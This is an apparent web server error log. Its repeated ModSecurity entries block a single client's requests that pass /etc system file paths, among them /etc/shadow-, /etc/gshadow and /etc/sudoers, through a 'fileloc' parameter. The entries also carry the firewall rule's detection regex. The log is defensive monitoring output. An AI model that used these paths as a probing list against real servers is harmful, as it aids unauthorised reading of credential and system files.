[Fri Mar 20 07:38:35.342167 2026] [:error] [pid 15826:tid 140411699963648] [client 216.73.216.191:3607] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq-oXxyEfFpUF8f99TQAAAUU"]
[Fri Mar 20 07:38:35.354866 2026] [:error] [pid 9818:tid 140411574073088] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq11pVZ5mVmJwsFMsDgAAAFQ"]
[Fri Mar 20 07:38:35.408114 2026] [:error] [pid 11167:tid 140411540502272] [client 216.73.216.191:59706] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq_HIg5MgXLBnicPz0wAAAdg"]
[Fri Mar 20 07:38:35.513229 2026] [:error] [pid 9818:tid 140411590858496] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq11pVZ5mVmJwsFMsDwAAAFI"]
[Fri Mar 20 07:38:35.609452 2026] [:error] [pid 7893:tid 140411666392832] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jqxCii7xarUs8iHZjyQAAAgk"]
[Fri Mar 20 07:38:35.709403 2026] [:error] [pid 9818:tid 140411674785536] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq11pVZ5mVmJwsFMsEAAAAEg"]
[Fri Mar 20 07:38:35.814295 2026] [:error] [pid 7893:tid 140411574073088] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jqxCii7xarUs8iHZjygAAAhQ"]
[Fri Mar 20 07:38:35.913329 2026] [:error] [pid 9818:tid 140411641214720] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq11pVZ5mVmJwsFMsEgAAAEw"]
[Fri Mar 20 07:38:36.015436 2026] [:error] [pid 7893:tid 140411658000128] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrBCii7xarUs8iHZjywAAAgo"]
[Fri Mar 20 07:38:36.119165 2026] [:error] [pid 9818:tid 140411683178240] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrF1pVZ5mVmJwsFMsEwAAAEc"]
[Fri Mar 20 07:38:36.215782 2026] [:error] [pid 7893:tid 140411674785536] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrBCii7xarUs8iHZjzAAAAgg"]
[Fri Mar 20 07:38:36.319300 2026] [:error] [pid 9818:tid 140411607643904] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrF1pVZ5mVmJwsFMsFAAAAFA"]
[Fri Mar 20 07:38:36.418059 2026] [:error] [pid 7893:tid 140411582465792] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrBCii7xarUs8iHZjzQAAAhM"]
[Fri Mar 20 07:38:36.518028 2026] [:error] [pid 9818:tid 140411666392832] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrF1pVZ5mVmJwsFMsFQAAAEk"]
[Fri Mar 20 07:38:36.619796 2026] [:error] [pid 7893:tid 140411741927168] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrBCii7xarUs8iHZjzgAAAgA"]
[Fri Mar 20 07:38:36.719353 2026] [:error] [pid 9818:tid 140411548894976] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrF1pVZ5mVmJwsFMsFwAAAFc"]
[Fri Mar 20 07:38:36.821457 2026] [:error] [pid 7893:tid 140411699963648] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrBCii7xarUs8iHZjzwAAAgU"]
[Fri Mar 20 07:38:36.922495 2026] [:error] [pid 9818:tid 140411599251200] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrF1pVZ5mVmJwsFMsGAAAAFE"]
[Fri Mar 20 07:38:37.031183 2026] [:error] [pid 7893:tid 140411590858496] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrRCii7xarUs8iHZj0gAAAhI"]
[Fri Mar 20 07:38:37.124156 2026] [:error] [pid 9818:tid 140411540502272] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrV1pVZ5mVmJwsFMsGgAAAFg"]
[Fri Mar 20 07:38:37.228092 2026] [:error] [pid 7893:tid 140411632822016] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrRCii7xarUs8iHZj1AAAAg0"]
[Fri Mar 20 07:38:37.325888 2026] [:error] [pid 9818:tid 140411557287680] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrV1pVZ5mVmJwsFMsGwAAAFY"]
[Fri Mar 20 07:38:37.428429 2026] [:error] [pid 7893:tid 140411683178240] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrRCii7xarUs8iHZj1QAAAgc"]
[Fri Mar 20 07:38:37.528392 2026] [:error] [pid 9818:tid 140411733534464] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrV1pVZ5mVmJwsFMsHAAAAEE"]
[Fri Mar 20 07:38:37.631886 2026] [:error] [pid 7893:tid 140411716749056] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrRCii7xarUs8iHZj1gAAAgM"]
[Fri Mar 20 07:38:37.735136 2026] [:error] [pid 9818:tid 140411582465792] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrV1pVZ5mVmJwsFMsHQAAAFM"]
[Fri Mar 20 07:38:37.835776 2026] [:error] [pid 7893:tid 140411616036608] [client 216.73.216.191:45550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrRCii7xarUs8iHZj1wAAAg8"]
[Fri Mar 20 07:38:37.933674 2026] [:error] [pid 9818:tid 140411708356352] [client 216.73.216.191:40362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrV1pVZ5mVmJwsFMsHgAAAEQ"]
